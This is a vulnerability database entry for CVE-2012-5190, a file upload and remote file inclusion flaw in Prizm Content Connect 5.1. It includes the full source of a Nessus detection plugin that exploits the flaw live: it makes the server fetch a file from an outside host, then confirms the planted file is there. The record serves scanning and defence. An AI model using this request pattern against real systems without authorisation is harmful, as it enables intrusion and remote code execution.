Vulnerabilities > CVE-2012-5190 - Unrestricted Upload of File with Dangerous Type vulnerability in Accusoft Prizm Content Connect 5.1

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
accusoft
CWE-434
nessus
exploit available

Summary

Prizm Content Connect 5.1 has an Arbitrary File Upload Vulnerability

Vulnerable Configurations

Part Description Count
Application
Accusoft
1

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Accessing Functionality Not Properly Constrained by ACLs
    In applications, particularly web applications, access to functionality is mitigated by the authorization framework, whose job it is to map ACLs to elements of the application's functionality; particularly URL's for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application or can run queries for data that he is otherwise not supposed to.
  • Privilege Abuse
    An adversary is able to exploit features of the target that should be reserved for privileged users or administrators but are exposed to use by lower or non-privileged accounts. Access to sensitive information and functionality must be controlled to ensure that only authorized users are able to access these resources. If access control mechanisms are absent or misconfigured, a user may be able to access resources that are intended only for higher level users. An adversary may be able to exploit this to utilize a less trusted account to gain information and perform activities reserved for more trusted accounts. This attack differs from privilege escalation and other privilege stealing attacks in that the adversary never actually escalates their privileges but instead is able to use a lesser degree of privilege to access resources that should be (but are not) reserved for higher privilege accounts. Likewise, the adversary does not exploit trust or subvert systems - all control functionality is working as configured but the configuration does not adequately protect sensitive resources at an appropriate level.

Exploit-Db

descriptionPrizm Content Connect Arbitrary File Upload Vulnerability. CVE-2012-5190. Webapps exploit for php platform
idEDB-ID:38204
last seen2016-02-04
modified2013-01-09
published2013-01-09
reporterInclude Security Research
sourcehttps://www.exploit-db.com/download/38204/
titlePrizm Content Connect Arbitrary File Upload Vulnerability

Nessus

NASL familyCGI abuses
NASL idPRIZM_CONTENT_CONNECT_DOCUMENT_RFI.NASL
descriptionThe remote web server hosts Prizm Content Connect, a fully customizable document viewer. The
last seen2020-06-01
modified2020-06-02
plugin id64684
published2013-02-19
reporterThis script is Copyright (C) 2013-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/64684
titlePrizm Content Connect default.aspx document Parameter Remote File Inclusion
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(64684);
  script_version("1.5");
  script_cvs_date("Date: 2018/11/15 20:50:18");

  script_cve_id("CVE-2012-5190");
  script_bugtraq_id(57242);

  script_name(english:"Prizm Content Connect default.aspx document Parameter Remote File Inclusion");
  script_summary(english:"Attempts to read a remote file");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server hosts an aspx script that is prone to a remote
file inclusion attack.");
  script_set_attribute(attribute:"description", value:
"The remote web server hosts Prizm Content Connect, a fully customizable
document viewer. 

The 'default.aspx' script included with the install fails to sanitize
user input to the 'document' parameter before reading a file.  A remote
attacker can leverage this issue to view arbitrary files or execute
arbitrary PHP code, possibly taken from third-party hosts, on the remote
host.");
  #https://packetstormsecurity.com/files/119456/Prizm-Content-Connect-Code-Execution.html 
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?5789ea12");
  script_set_attribute(attribute:"solution", value:"Unknown at this time.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"vuln_publication_date", value:"2013/01/09");
  script_set_attribute(attribute:"plugin_publication_date", value:"2013/02/19");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"x-cpe:/a:accusoft:prizm_content_connect");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");

port = get_http_port(default:80);

appname = "Prizm Content Connect";
base_url = "/Default.aspx";
rfi_url = base_url + "?document=http://rfi.nessus.org/rfi.txt";
res = http_send_recv3(method:"GET", item:rfi_url, port:port, exit_on_fail:TRUE);
if (
  "<title>AJAX Document Viewer Professional Edition</title>" >< res[2] &&
  'href="http://www.accusoft.com/prizmfaq.htm' >< res[2] &&
  match = eregmatch(pattern:"<b>Full Document Path:</b>\s+(.*\.txt)", string:res[2])
)
{
   path = match[1];
   file = split(match[1], sep:"\");
   file = file[2];
}
else audit(AUDIT_WEB_APP_NOT_INST, appname, port); 

url = "/" + file;
res = http_send_recv3(method:"GET", item:url, port:port, exit_on_fail:TRUE);
if (
  "TmVzc3VzQ29kZUV4ZWNUZXN0" >< res[2] &&
  "NessusFileIncludeTest" >< res[2]
)
{
  if (report_verbosity > 0)
  {
    snip =  crap(data:"-", length:30)+' snip '+ crap(data:"-", length:30);
    report =
      '\nNessus was able to verify the issue exists using the following requests :' +
      '\n' +
      '\n  ' + build_url(qs:rfi_url, port: port) +
      '\n  ' + build_url(qs:url, port: port) + '\n' +
      '\nNote: This file has not been removed by Nessus and will need to be' +
      '\nmanually deleted (' + path + ').' +
      '\n';
    if(report_verbosity > 1) 
    {
      report +=
        '\n' + 'This produced the following output :' +
        '\n' +
        '\n' + snip +
        '\n' + chomp(res) +
        '\n' + snip +
        '\n';
    } 
    security_hole(port:port, extra:report);
  }
  else security_hole(port);
  exit(0);
}
else audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, build_url(qs:base_url, port:port));

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/119456/prizmcontentconnect-exec.txt
idPACKETSTORM:119456
last seen2016-12-05
published2013-01-11
reporterInclude Security Research
sourcehttps://packetstormsecurity.com/files/119456/Prizm-Content-Connect-Code-Execution.html
titlePrizm Content Connect Code Execution